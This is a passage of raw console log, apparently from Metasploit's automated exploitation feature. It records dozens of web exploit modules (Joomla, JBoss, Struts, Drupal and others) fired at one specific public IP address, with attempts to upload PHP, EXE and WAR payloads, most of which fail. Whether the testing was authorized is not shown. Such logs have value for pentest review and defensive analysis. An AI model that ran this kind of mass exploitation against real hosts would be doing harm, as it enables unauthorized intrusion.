  278. [-] [2016.08.17-21:03:50] No bind payloads available for exploit/unix/webapp/nagios3_statuswml_ping)
  279. [-] [2016.08.17-21:03:50] [0070] Exploit failed: A payload has not been selected.
  280. [+] [2016.08.17-21:03:51] Workspace:Seocam Progress:75/337 (22%) [71/332] 166.62.27.177:80 - Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include
  281. [*] [2016.08.17-21:03:51] Using a random high port (38641) for 166.62.27.177
  282. [-] [2016.08.17-21:03:51] Fatal: Could not select a callback port when bind connections are specified
  283. [*] [2016.08.17-21:03:51] [0071] Started bind handler
  284. [-] [2016.08.17-21:03:51] [0071] 166.62.27.177:80 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080).
  285. [+] [2016.08.17-21:03:51] Workspace:Seocam Progress:76/337 (22%) [72/332] 166.62.27.177:80 - Ruby on Rails Known Secret Session Cookie Remote Code Execution
  286. [-] [2016.08.17-21:03:51] No bind payloads available for exploit/multi/http/rails_secret_deserialization)
  287. [-] [2016.08.17-21:03:52] [0031] No auto login password has been defined!
  288. [*] [2016.08.17-21:03:52] [0031] Attempting to extract admin password hash with SQLi
  289. [+] [2016.08.17-21:03:52] Workspace:Seocam Progress:77/337 (22%) [73/332] 166.62.27.177:80 - InstantCMS 1.6 Remote PHP Code Execution
  290. [*] [2016.08.17-21:03:53] Using a random high port (15618) for 166.62.27.177
  291. [+] [2016.08.17-21:03:53] Workspace:Seocam Progress:78/337 (23%) [74/332] 166.62.27.177:80 - Generic Web Application Unix Command Execution
  292. [*] [2016.08.17-21:03:53] [0073] Started bind handler
  293. [-] [2016.08.17-21:03:54] No bind payloads available for exploit/pro/web/generic_exec)
  294. [-] [2016.08.17-21:03:54] [0074] 166.62.27.177:80 - Exploit failed: A payload has not been selected.
  295. [*] [2016.08.17-21:03:54] [0073] Executing payload...
  296. [+] [2016.08.17-21:03:54] Workspace:Seocam Progress:79/337 (23%) [75/332] 166.62.27.177:80 - GestioIP Remote Command Execution
  297. [-] [2016.08.17-21:03:54] No bind payloads available for exploit/multi/http/gestioip_exec)
  298. [-] [2016.08.17-21:03:54] [0075] Exploit failed: A payload has not been selected.
  299. [+] [2016.08.17-21:03:54] Workspace:Seocam Progress:80/337 (23%) [76/332] 166.62.27.177:80 - Matt Wright guestbook.pl Arbitrary Command Execution
  300. [-] [2016.08.17-21:03:55] No bind payloads available for exploit/unix/webapp/guestbook_ssi_exec)
  301. [-] [2016.08.17-21:03:55] [0076] Exploit failed: A payload has not been selected.
  302. [+] [2016.08.17-21:03:55] Workspace:Seocam Progress:81/337 (24%) [77/332] 166.62.27.177:80 - Google Appliance ProxyStyleSheet Command Execution
  303. [-] [2016.08.17-21:03:55] No bind payloads available for exploit/unix/webapp/google_proxystylesheet_exec)
  304. [-] [2016.08.17-21:03:55] Fatal: Could not select a callback port when bind connections are specified
  305. [-] [2016.08.17-21:03:55] [0077] Exploit failed: A payload has not been selected.
  306. [+] [2016.08.17-21:03:56] Workspace:Seocam Progress:82/337 (24%) [78/332] 166.62.27.177:80 - Openfire Admin Console Authentication Bypass
  307. [*] [2016.08.17-21:03:56] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  308. [*] [2016.08.17-21:03:56] Using a random high port (17684) for 166.62.27.177
  309. [-] [2016.08.17-21:03:56] [0078] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.4.23" does not match "(?-mix:(Jetty))", use 'set FingerprintCheck false' to disable this check.
  310. [-] [2016.08.17-21:03:56] [0069] Failed to acquire administrator username
  311. [+] [2016.08.17-21:03:56] Workspace:Seocam Progress:83/337 (24%) [79/332] 166.62.27.177:80 - Generic Web Application Unix Command Execution
  312. [-] [2016.08.17-21:03:56] No bind payloads available for exploit/unix/webapp/generic_exec)
  313. [-] [2016.08.17-21:03:56] [0079] 166.62.27.177:80 - Exploit failed: A payload has not been selected.
  314. [+] [2016.08.17-21:03:57] Workspace:Seocam Progress:84/337 (24%) [80/332] 166.62.27.177:80 - Drupal RESTWS Module Remote PHP Code Execution
  315. [*] [2016.08.17-21:03:57] Using a random high port (47549) for 166.62.27.177
  316. [*] [2016.08.17-21:03:57] [0080] Started bind handler
  317. [+] [2016.08.17-21:03:57] Workspace:Seocam Progress:85/337 (25%) [81/332] 166.62.27.177:80 - VMware Hyperic HQ Groovy Script-Console Java Execution
  318. [*] [2016.08.17-21:03:57] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  319. [*] [2016.08.17-21:03:58] Using a random high port (6543) for 166.62.27.177
  320. [*] [2016.08.17-21:03:58] [0081] Started bind handler
  321. [-] [2016.08.17-21:03:59] [0081] Exploit failed [unreachable]: OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 state=SSLv2/v3 read server hello A: unknown protocol
  322. [+] [2016.08.17-21:03:59] Workspace:Seocam Progress:86/337 (25%) [82/332] 166.62.27.177:80 - Dogfood CRM spell.php Remote Command Execution
  323. [-] [2016.08.17-21:03:59] No bind payloads available for exploit/unix/webapp/dogfood_spell_exec)
  324. [-] [2016.08.17-21:03:59] [0082] Exploit failed: A payload has not been selected.
  325. [+] [2016.08.17-21:03:59] Workspace:Seocam Progress:87/337 (25%) [83/332] 166.62.27.177:80 - ContentKeeper Web Remote Command Execution
  326. [-] [2016.08.17-21:03:59] No bind payloads available for exploit/unix/http/contentkeeperweb_mimencode)
  327. [-] [2016.08.17-21:03:59] [0083] 166.62.27.177:80 - Exploit failed: A payload has not been selected.
  328. [+] [2016.08.17-21:04:00] Workspace:Seocam Progress:88/337 (26%) [84/332] 166.62.27.177:80 - Dell KACE K1000 File Upload
  329. [*] [2016.08.17-21:04:00] [0066] 166.62.27.177:80 - Received:
  330. [-] [2016.08.17-21:04:00] No bind payloads available for exploit/unix/http/dell_kace_k1000_upload)
  331. [-] [2016.08.17-21:04:00] [0066] 166.62.27.177:80 - No reply from the target, this may not be a vulnerable system
  332. [-] [2016.08.17-21:04:00] [0084] Exploit failed: A payload has not been selected.
  333. [*] [2016.08.17-21:04:00] [0066] 166.62.27.177:80 - Server stopped.
  334. [+] [2016.08.17-21:04:00] Workspace:Seocam Progress:89/337 (26%) [85/332] 166.62.27.177:80 - JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)
  335. [*] [2016.08.17-21:04:00] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  336. [*] [2016.08.17-21:04:00] Using a random high port (34090) for 166.62.27.177
  337. [-] [2016.08.17-21:04:00] [0085] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.4.23" does not match "(?-mix:JBoss)", use 'set FingerprintCheck false' to disable this check.
  338. [+] [2016.08.17-21:04:00] Workspace:Seocam Progress:90/337 (26%) [86/332] 166.62.27.177:80 - JBoss JMX Console Deployer Upload and Execute
  339. [*] [2016.08.17-21:04:01] Using a random high port (29338) for 166.62.27.177
  340. [-] [2016.08.17-21:04:01] Fatal: Could not select a callback port when bind connections are specified
  341. [+] [2016.08.17-21:04:01] Workspace:Seocam Progress:91/337 (27%) [87/332] 166.62.27.177:80 - Coppermine Photo Gallery picEditor.php Command Execution
  342. [-] [2016.08.17-21:04:01] No bind payloads available for exploit/unix/webapp/coppermine_piceditor)
  343. [-] [2016.08.17-21:04:01] [0087] Exploit failed: A payload has not been selected.
  344. [+] [2016.08.17-21:04:01] Workspace:Seocam Progress:92/337 (27%) [88/332] 166.62.27.177:80 - ClipBucket Remote Code Execution
  345. [*] [2016.08.17-21:04:01] Using a random high port (4859) for 166.62.27.177
  346. [*] [2016.08.17-21:04:01] [0088] Started bind handler
  347. [*] [2016.08.17-21:04:01] [0088] Uploading payload [ 9PkLDQp4z.php ]
  348. [+] [2016.08.17-21:04:02] Workspace:Seocam Progress:93/337 (27%) [89/332] 166.62.27.177:80 - Nibbleblog File Upload Vulnerability
  349. [*] [2016.08.17-21:04:02] Using a random high port (31818) for 166.62.27.177
  350. [+] [2016.08.17-21:04:02] Workspace:Seocam Progress:94/337 (27%) [90/332] 166.62.27.177:80 - AWStats configdir Remote Command Execution
  351. [-] [2016.08.17-21:04:02] [0088] Exploit aborted due to failure: none: 166.62.27.177:80 - File wasn't uploaded, aborting!
  352. [-] [2016.08.17-21:04:02] No bind payloads available for exploit/unix/webapp/awstats_configdir_exec)
  353. [-] [2016.08.17-21:04:02] [0090] Exploit failed: A payload has not been selected.
  354. [+] [2016.08.17-21:04:02] Workspace:Seocam Progress:95/337 (28%) [91/332] 166.62.27.177:80 - Th3 MMA mma.php Backdoor Arbitrary File Upload
  355. [*] [2016.08.17-21:04:03] Using a random high port (54646) for 166.62.27.177
  356. [*] [2016.08.17-21:04:03] [0091] Started bind handler
  357. [*] [2016.08.17-21:04:03] [0091] Trying to upload cJoHP.php to mma.php Backdoor
  358. [+] [2016.08.17-21:04:03] Workspace:Seocam Progress:96/337 (28%) [92/332] 166.62.27.177:80 - Cacti graph_view.php Remote Command Execution
  359. [-] [2016.08.17-21:04:03] No bind payloads available for exploit/unix/webapp/cacti_graphimage_exec)
  360. [-] [2016.08.17-21:04:03] [0092] 166.62.27.177:80 - Exploit failed: A payload has not been selected.
  361. [+] [2016.08.17-21:04:03] Workspace:Seocam Progress:97/337 (28%) [93/332] 166.62.27.177:80 - BASE base_qry_common Remote File Include
  362. [-] [2016.08.17-21:04:03] [0091] Exploit aborted due to failure: unexpected-reply: 166.62.27.177:80 - Unable to deploy payload, server returned 404
  363. [*] [2016.08.17-21:04:03] Using a random high port (23260) for 166.62.27.177
  364. [-] [2016.08.17-21:04:03] Fatal: Could not select a callback port when bind connections are specified
  365. [*] [2016.08.17-21:04:04] [0093] Started bind handler
  366. [+] [2016.08.17-21:04:04] Workspace:Seocam Progress:98/337 (29%) [94/332] 166.62.27.177:80 - Barracuda IMG.PL Remote Command Execution
  367. [-] [2016.08.17-21:04:04] No bind payloads available for exploit/unix/webapp/barracuda_img_exec)
  368. [-] [2016.08.17-21:04:04] [0094] 166.62.27.177:80 - Exploit failed: A payload has not been selected.
  369. [-] [2016.08.17-21:04:04] [0093] 166.62.27.177:80 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080).
  370. [+] [2016.08.17-21:04:04] Workspace:Seocam Progress:99/337 (29%) [95/332] 166.62.27.177:80 - ManageEngine ServiceDesk Plus Arbitrary File Upload
  371. [*] [2016.08.17-21:04:04] Using a random high port (52283) for 166.62.27.177
  372. [*] [2016.08.17-21:04:04] [0095] Started bind handler
  373. [+] [2016.08.17-21:04:05] Workspace:Seocam Progress:100/337 (29%) [96/332] 166.62.27.177:80 - AWStats Totals multisort Remote Command Execution
  374. [-] [2016.08.17-21:04:05] No bind payloads available for exploit/unix/webapp/awstatstotals_multisort)
  375. [-] [2016.08.17-21:04:05] [0096] Exploit failed: A payload has not been selected.
  376. [+] [2016.08.17-21:04:05] Workspace:Seocam Progress:101/337 (29%) [97/332] 166.62.27.177:80 - Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)
  377. [*] [2016.08.17-21:04:05] Using a random high port (54275) for 166.62.27.177
  378. [*] [2016.08.17-21:04:05] [0095] Uploading EAR file...
  379. [-] [2016.08.17-21:04:05] [0097] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.4.23" does not match "(?-mix:Apache.*(Coyote|Tomcat)|Jetty.*)", use 'set FingerprintCheck false' to disable this check.
  380. [+] [2016.08.17-21:04:06] Workspace:Seocam Progress:102/337 (30%) [98/332] 166.62.27.177:80 - JBoss JMX Console Beanshell Deployer WAR Upload and Deployment
  381. [*] [2016.08.17-21:04:06] Using a random high port (19551) for 166.62.27.177
  382. [+] [2016.08.17-21:04:06] Workspace:Seocam Progress:103/337 (30%) [99/332] 166.62.27.177:80 - JBoss Java Class DeploymentFileRepository WAR Deployment
  383. [*] [2016.08.17-21:04:06] Using a random high port (1230) for 166.62.27.177
  384. [-] [2016.08.17-21:04:07] [0095] Exploit aborted due to failure: unknown: 166.62.27.177:80 - EAR upload failed
  385. [+] [2016.08.17-21:04:07] Workspace:Seocam Progress:104/337 (30%) [100/332] 166.62.27.177:80 - Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability
  386. [*] [2016.08.17-21:04:07] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  387. [*] [2016.08.17-21:04:07] Using a random high port (25044) for 166.62.27.177
  388. [-] [2016.08.17-21:04:07] [0098] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.4.23" does not match "(?-mix:(Jetty|JBoss))", use 'set FingerprintCheck false' to disable this check.
  389. [*] [2016.08.17-21:04:08] [0100] Started bind handler
  390. [-] [2016.08.17-21:04:08] [0099] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.4.23" does not match "(?-mix:(Jetty|JBoss))", use 'set FingerprintCheck false' to disable this check.
  391. [*] [2016.08.17-21:04:08] [0100] Sending request to 166.62.27.177:80
  392. [+] [2016.08.17-21:04:10] Workspace:Seocam Progress:105/337 (31%) [101/332] 166.62.27.177:80 - Oracle VM Server Virtual Server Agent Command Injection
  393. [-] [2016.08.17-21:04:10] No bind payloads available for exploit/unix/webapp/oracle_vm_agent_utl)
  394. [-] [2016.08.17-21:04:10] [0100] Exploit failed [unreachable]: OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 state=SSLv2/v3 read server hello A: unknown protocol
  395. [+] [2016.08.17-21:04:11] Workspace:Seocam Progress:106/337 (31%) [102/332] 166.62.27.177:80 - Oracle Database Client System Analyzer Arbitrary File Upload
  396. [*] [2016.08.17-21:04:11] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  397. [*] [2016.08.17-21:04:11] Using a random high port (35977) for 166.62.27.177
  398. [-] [2016.08.17-21:04:11] [0102] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.4.23" does not match "(?-mix:Oracle Containers for J2EE)", use 'set FingerprintCheck false' to disable this check.
  399. [+] [2016.08.17-21:04:11] Workspace:Seocam Progress:107/337 (31%) [103/332] 166.62.27.177:80 - MS10-104 Microsoft Office SharePoint Server 2007 Remote Code Execution
  400. [*] [2016.08.17-21:04:11] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  401. [*] [2016.08.17-21:04:11] Using a random high port (36214) for 166.62.27.177
  402. [+] [2016.08.17-21:04:12] Workspace:Seocam Progress:108/337 (32%) [104/332] 166.62.27.177:80 - Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability
  403. [*] [2016.08.17-21:04:12] [0103] Started bind handler
  404. [*] [2016.08.17-21:04:12] Using a random high port (19454) for 166.62.27.177
  405. [*] [2016.08.17-21:04:12] [0104] Started bind handler
  406. [+] [2016.08.17-21:04:12] Workspace:Seocam Progress:109/337 (32%) [105/332] 166.62.27.177:80 - CakePHP Cache Corruption Code Execution
  407. [*] [2016.08.17-21:04:13] [0104] Uploading PHP payload (1189 bytes)
  408. [*] [2016.08.17-21:04:13] Using a random high port (38798) for 166.62.27.177
  409. [*] [2016.08.17-21:04:14] [0105] Started bind handler
  410. [-] [2016.08.17-21:04:14] [0104] Exploit aborted due to failure: unexpected-reply: 166.62.27.177:80 - Uploading PHP payload failed
  411. [*] [2016.08.17-21:04:14] [0103] Sending HTTP ConvertFile Request to upload the exe payload ofFjcowtUCsCq.exe
  412. [*] [2016.08.17-21:04:14] [0105] Sending exploit request 1
  413. [+] [2016.08.17-21:04:14] Workspace:Seocam Progress:110/337 (32%) [106/332] 166.62.27.177:80 - Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability
  414. [*] [2016.08.17-21:04:14] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  415. [*] [2016.08.17-21:04:15] Using a random high port (10700) for 166.62.27.177
  416. [*] [2016.08.17-21:04:15] [0106] Started bind handler
  417. [!] [2016.08.17-21:04:15] [0104] This exploit may require manual cleanup of '5903852.php' on the target
  418. [+] [2016.08.17-21:04:15] Workspace:Seocam Progress:111/337 (32%) [107/332] 166.62.27.177:80 - Citrix Access Gateway Command Execution
  419. [-] [2016.08.17-21:04:15] No bind payloads available for exploit/unix/webapp/citrix_access_gateway_exec)
  420. [-] [2016.08.17-21:04:15] [0107] Exploit failed: A payload has not been selected.
  421. [-] [2016.08.17-21:04:16] [0106] Exploit aborted due to failure: not-vulnerable: Target does not appear to be Oracle BeeHive
  422. [-] [2016.08.17-21:04:16] [0103] Failed to upload ofFjcowtUCsCq.exe
  423. [+] [2016.08.17-21:04:16] Workspace:Seocam Progress:112/337 (33%) [108/332] 166.62.27.177:80 - HP OpenView Performance Insight Server Backdoor Account Code Execution
  424. [-] [2016.08.17-21:04:16] No bind payloads available for exploit/windows/http/hp_openview_insight_backdoor)
  425. [-] [2016.08.17-21:04:16] [0108] Exploit failed: A payload has not been selected.
  426. [+] [2016.08.17-21:04:16] Workspace:Seocam Progress:113/337 (33%) [109/332] 166.62.27.177:80 - Sun/Oracle GlassFish Server Authenticated Code Execution
  427. [*] [2016.08.17-21:04:16] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  428. [-] [2016.08.17-21:04:17] [0031] Unable to extract password hash!
  429. [-] [2016.08.17-21:04:17] [0031] Exploit aborted due to failure: no-access: 166.62.27.177:80 - Unable to perform remote code execution!
  430. [*] [2016.08.17-21:04:17] Using a random high port (50749) for 166.62.27.177
  431. [+] [2016.08.17-21:04:17] Workspace:Seocam Progress:114/337 (33%) [110/332] 166.62.27.177:80 - CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection
  432. [*] [2016.08.17-21:04:17] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  433. [*] [2016.08.17-21:04:17] [0109] Started bind handler
  434. [*] [2016.08.17-21:04:17] Using a random high port (2246) for 166.62.27.177
  435. [*] [2016.08.17-21:04:18] [0110] Started bind handler
  436. [*] [2016.08.17-21:04:18] [0110] Sending request to 166.62.27.177:80
  437. [*] [2016.08.17-21:04:19] [0109] Unsupported version: Apache/2.4.23
  438. [*] [2016.08.17-21:04:19] [0109] Glassfish edition: Apache/2.4.23
  439. [+] [2016.08.17-21:04:20] Workspace:Seocam Progress:115/337 (34%) [111/332] 166.62.27.177:80 - Novell ZENworks Asset Management Remote Execution
  440. [*] [2016.08.17-21:04:20] Using a random high port (13780) for 166.62.27.177
  441. [-] [2016.08.17-21:04:20] [0111] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.4.23" does not match "(?-mix:Apache-Coyote)", use 'set FingerprintCheck false' to disable this check.
  442. [-] [2016.08.17-21:04:20] [0110] Exploit failed [unreachable]: OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 state=SSLv2/v3 read server hello A: unknown protocol
  443. [+] [2016.08.17-21:04:20] Workspace:Seocam Progress:116/337 (34%) [112/332] 166.62.27.177:80 - LifeSize Room Command Injection
  444. [-] [2016.08.17-21:04:21] No bind payloads available for exploit/unix/http/lifesize_room)
  445. [-] [2016.08.17-21:04:21] [0112] Exploit failed: A payload has not been selected.
  446. [*] [2016.08.17-21:04:21] [0109] Trying to login as admin:
  447. [-] [2016.08.17-21:04:21] [0109] Exploit aborted due to failure: no-access: http://166.62.27.177:80/ - GlassFish - Failed to authenticate
  448. [*] [2016.08.17-21:04:21] [0105] Sending exploit request 2
  449. [+] [2016.08.17-21:04:21] Workspace:Seocam Progress:117/337 (34%) [113/332] 166.62.27.177:80 - CA Arcserve D2D GWT RPC Credential Information Disclosure
  450. [*] [2016.08.17-21:04:21] Using a random high port (55953) for 166.62.27.177
  451. [+] [2016.08.17-21:04:21] Workspace:Seocam Progress:118/337 (35%) [114/332] 166.62.27.177:80 - Plone and Zope XMLTools Remote Command Execution
  452. [*] [2016.08.17-21:04:21] [0113] Started bind handler
  453. [-] [2016.08.17-21:04:21] No bind payloads available for exploit/multi/http/plone_popen2)
  454. [-] [2016.08.17-21:04:21] [0114] Exploit failed: A payload has not been selected.
  455. [*] [2016.08.17-21:04:21] [0113] Sending request to 166.62.27.177:80
  456. [+] [2016.08.17-21:04:22] Workspace:Seocam Progress:119/337 (35%) [115/332] 166.62.27.177:80 - Support Incident Tracker Remote Command Execution
  457. [*] [2016.08.17-21:04:22] Using a random high port (58091) for 166.62.27.177
  458. [+] [2016.08.17-21:04:22] Workspace:Seocam Progress:120/337 (35%) [116/332] 166.62.27.177:80 - Apache Struts ParametersInterceptor Remote Code Execution
  459. [*] [2016.08.17-21:04:22] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  460. [*] [2016.08.17-21:04:22] Using a random high port (57211) for 166.62.27.177
  461. [*] [2016.08.17-21:04:22] [0116] Started bind handler
  462. [-] [2016.08.17-21:04:22] [0116] Exploit failed: Msf::NoCompatiblePayloadError Failed to generate an executable payload due to an invalid platform or arch.
  463. [-] [2016.08.17-21:04:22] [0113] Exploit aborted due to failure: not-found: The server did not return credentials
  464. [+] [2016.08.17-21:04:23] Workspace:Seocam Progress:121/337 (35%) [117/332] 166.62.27.177:80 - phpLDAPadmin query_engine Remote PHP Code Injection
  465. [*] [2016.08.17-21:04:23] Using a random high port (26940) for 166.62.27.177
  466. [*] [2016.08.17-21:04:23] [0117] Started bind handler
  467. [+] [2016.08.17-21:04:23] Workspace:Seocam Progress:122/337 (36%) [118/332] 166.62.27.177:80 - HP Managed Printing Administration jobAcct Remote Command Execution
  468. [*] [2016.08.17-21:04:23] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  469. [*] [2016.08.17-21:04:23] Using a random high port (26394) for 166.62.27.177
  470. [+] [2016.08.17-21:04:24] Workspace:Seocam Progress:123/337 (36%) [119/332] 166.62.27.177:80 - WikkaWiki 1.3.2 Spam Logging PHP Injection
  471. [*] [2016.08.17-21:04:24] [0118] Started bind handler
  472. [*] [2016.08.17-21:04:24] Using a random high port (26940) for 166.62.27.177
  473. [-] [2016.08.17-21:04:24] [0117] Could not generate a valid session
  474. [+] [2016.08.17-21:04:24] Workspace:Seocam Progress:124/337 (36%) [120/332] 166.62.27.177:80 - PmWiki pagelist.php Remote PHP Code Injection Exploit
  475. [*] [2016.08.17-21:04:25] Using a random high port (7632) for 166.62.27.177
  476. [*] [2016.08.17-21:04:27] [0118] Uploading 14944 bytes to /hpmpa/userfiles/images/printers/...
  477. [*] [2016.08.17-21:04:27] [0120] Started bind handler
  478. [*] [2016.08.17-21:04:28] [0105] Requesting our payload
  479. [-] [2016.08.17-21:04:28] [0118] Unknown error while while writing to /hpmpa/userfiles/images/printers/
  480. [*] [2016.08.17-21:04:28] [0118] Uploading 14944 bytes to /hpmpa/userfiles/images/backgrounds/...
  481. [+] [2016.08.17-21:04:28] Workspace:Seocam Progress:125/337 (37%) [121/332] 166.62.27.177:80 - Hastymail 2.1.1 RC1 Command Injection
  482. [-] [2016.08.17-21:04:28] No bind payloads available for exploit/unix/webapp/hastymail_exec)
  483. [+] [2016.08.17-21:04:29] Workspace:Seocam Progress:126/337 (37%) [122/332] 166.62.27.177:80 - Splunk Search Remote Code Execution
  484. [-] [2016.08.17-21:04:29] No bind payloads available for exploit/multi/http/splunk_mappy_exec)
  485. [-] [2016.08.17-21:04:29] [0122] Exploit failed: A payload has not been selected.
  486. [+] [2016.08.17-21:04:30] Workspace:Seocam Progress:127/337 (37%) [123/332] 166.62.27.177:80 - Log1 CMS writeInfo() PHP Code Injection
  487. [*] [2016.08.17-21:04:30] Using a random high port (9196) for 166.62.27.177
  488. [*] [2016.08.17-21:04:30] [0123] Started bind handler
  489. [*] [2016.08.17-21:04:30] [0123] Sending PHP payload (1627 bytes)
  490. [+] [2016.08.17-21:04:31] Workspace:Seocam Progress:128/337 (37%) [124/332] 166.62.27.177:80 - V-CMS PHP File Upload and Execute
  491. [*] [2016.08.17-21:04:32] [0123] Requesting data.php
  492. [*] [2016.08.17-21:04:32] Using a random high port (25417) for 166.62.27.177
  493. [*] [2016.08.17-21:04:32] [0124] Started bind handler
  494. [*] [2016.08.17-21:04:32] [0124] 166.62.27.177:80 Uploading payload: pBIwz.php
  495. [-] [2016.08.17-21:04:32] [0118] Unknown error while while writing to /hpmpa/userfiles/images/backgrounds/
  496. [*] [2016.08.17-21:04:32] [0118] Uploading 14944 bytes to /hpmpa/userfiles/images/...
  497. [*] [2016.08.17-21:04:32] [0124] 166.62.27.177:80 replies status: 404
  498. [*] [2016.08.17-21:04:32] [0124] 166.62.27.177:80 Executing payload: pBIwz.php
  499. [-] [2016.08.17-21:04:33] [0124] 166.62.27.177:80 404 - the upload probably failed
  500. [-] [2016.08.17-21:04:33] [0118] Unknown error while while writing to /hpmpa/userfiles/images/
  501. [*] [2016.08.17-21:04:33] [0118] Uploading 14944 bytes to /hpmpa/userfiles/...
  502. [-] [2016.08.17-21:04:34] [0118] Unknown error while while writing to /hpmpa/userfiles/
  503. [*] [2016.08.17-21:04:34] [0118] Uploading 14944 bytes to /...
  504. [+] [2016.08.17-21:04:35] Workspace:Seocam Progress:129/337 (38%) [125/332] 166.62.27.177:80 - Joomla 1.5.12 TinyBrowser File Upload Code Execution
  505. [-] [2016.08.17-21:04:35] No bind payloads available for exploit/unix/webapp/joomla_tinybrowser)
  506. [-] [2016.08.17-21:04:35] [0125] Exploit failed: A payload has not been selected.
  507. [+] [2016.08.17-21:04:35] Workspace:Seocam Progress:130/337 (38%) [126/332] 166.62.27.177:80 - Snortreport nmap.php/nbtscan.php Remote Command Execution
  508. [-] [2016.08.17-21:04:35] No bind payloads available for exploit/multi/http/snortreport_exec)
  509. [-] [2016.08.17-21:04:35] [0126] 166.62.27.177:80 - Exploit failed: A payload has not been selected.
  510. [-] [2016.08.17-21:04:35] [0118] Unknown error while while writing to /
  511. [-] [2016.08.17-21:04:35] [0118] Exploit aborted due to failure: not-vulnerable: 166.62.27.177:80 - Failed to upload ASP payload to the target
  512. [+] [2016.08.17-21:04:35] Workspace:Seocam Progress:131/337 (38%) [127/332] 166.62.27.177:80 - Novell iManager getMultiPartParameters Arbitrary File Upload
  513. [-] [2016.08.17-21:04:36] No bind payloads available for exploit/windows/http/novell_imanager_upload)
  514. [-] [2016.08.17-21:04:36] [0127] Exploit failed: A payload has not been selected.
  515. [+] [2016.08.17-21:04:36] Workspace:Seocam Progress:132/337 (39%) [128/332] 166.62.27.177:80 - Mitel Audio and Web Conferencing Command Injection
  516. [-] [2016.08.17-21:04:36] No bind payloads available for exploit/unix/webapp/mitel_awc_exec)
  517. [-] [2016.08.17-21:04:36] [0128] Exploit failed: A payload has not been selected.
  518. [+] [2016.08.17-21:04:36] Workspace:Seocam Progress:133/337 (39%) [129/332] 166.62.27.177:80 - Redmine SCM Repository Arbitrary Command Execution
  519. [-] [2016.08.17-21:04:36] No bind payloads available for exploit/unix/webapp/redmine_scm_exec)
  520. [-] [2016.08.17-21:04:36] [0129] Exploit failed: A payload has not been selected.
  521. [+] [2016.08.17-21:04:37] Workspace:Seocam Progress:134/337 (39%) [130/332] 166.62.27.177:80 - Spreecommerce Arbitrary Command Execution
  522. [-] [2016.08.17-21:04:37] No bind payloads available for exploit/multi/http/spree_searchlogic_exec)
  523. [-] [2016.08.17-21:04:37] [0130] Exploit failed: A payload has not been selected.
  524. [+] [2016.08.17-21:04:37] Workspace:Seocam Progress:135/337 (40%) [131/332] 166.62.27.177:80 - WeBid converter.php Remote PHP Code Injection
  525. [*] [2016.08.17-21:04:37] Using a random high port (5073) for 166.62.27.177
  526. [*] [2016.08.17-21:04:37] [0131] Started bind handler
  527. [*] [2016.08.17-21:04:37] [0131] Injecting the PHP payload
  528. [+] [2016.08.17-21:04:38] Workspace:Seocam Progress:136/337 (40%) [132/332] 166.62.27.177:80 - Joomla Component JCE File Upload Remote Code Execution
  529. [*] [2016.08.17-21:04:38] Using a random high port (25033) for 166.62.27.177
  530. [*] [2016.08.17-21:04:38] [0132] Started bind handler
  531. [+] [2016.08.17-21:04:38] Workspace:Seocam Progress:137/337 (40%) [133/332] 166.62.27.177:80 - LotusCMS 3.0 eval() Remote Command Execution
  532. [*] [2016.08.17-21:04:38] Using a random high port (44478) for 166.62.27.177
  533. [*] [2016.08.17-21:04:38] [0132] Checking component version to 166.62.27.177:80
  534. [*] [2016.08.17-21:04:38] [0133] Started bind handler
  535. [+] [2016.08.17-21:04:38] Workspace:Seocam Progress:138/337 (40%) [134/332] 166.62.27.177:80 - Spreecommerce 0.60.1 Arbitrary Command Execution
  536. [-] [2016.08.17-21:04:39] No bind payloads available for exploit/multi/http/spree_search_exec)
  537. [-] [2016.08.17-21:04:39] [0134] Exploit failed: A payload has not been selected.
  538. [-] [2016.08.17-21:04:39] [0133] Unable to get the page parameter, please reconfigure URI
  539. [+] [2016.08.17-21:04:39] Workspace:Seocam Progress:139/337 (41%) [135/332] 166.62.27.177:80 - myBB 1.6.4 Backdoor Arbitrary Command Execution
  540. [*] [2016.08.17-21:04:39] Using a random high port (65339) for 166.62.27.177
  541. [*] [2016.08.17-21:04:39] [0135] Started bind handler
  542. [*] [2016.08.17-21:04:39] [0135] Sending exploit request
  543. [-] [2016.08.17-21:04:40] [0135] Cannot connect to /index.php on 166.62.27.177, got 404.
  544. [-] [2016.08.17-21:04:40] [0131] Server returned non-200 status code (404)
  545. [+] [2016.08.17-21:04:41] Workspace:Seocam Progress:140/337 (41%) [136/332] 166.62.27.177:80 - Family Connections less.php Remote Command Execution
  546. [-] [2016.08.17-21:04:42] No bind payloads available for exploit/multi/http/familycms_less_exec)
  547. [-] [2016.08.17-21:04:42] [0136] Exploit failed: A payload has not been selected.
  548. [+] [2016.08.17-21:04:42] Workspace:Seocam Progress:141/337 (41%) [137/332] 166.62.27.177:80 - Traq admincp/common.php Remote Code Execution
  549. [*] [2016.08.17-21:04:42] Using a random high port (25178) for 166.62.27.177
  550. [*] [2016.08.17-21:04:42] [0137] Started bind handler
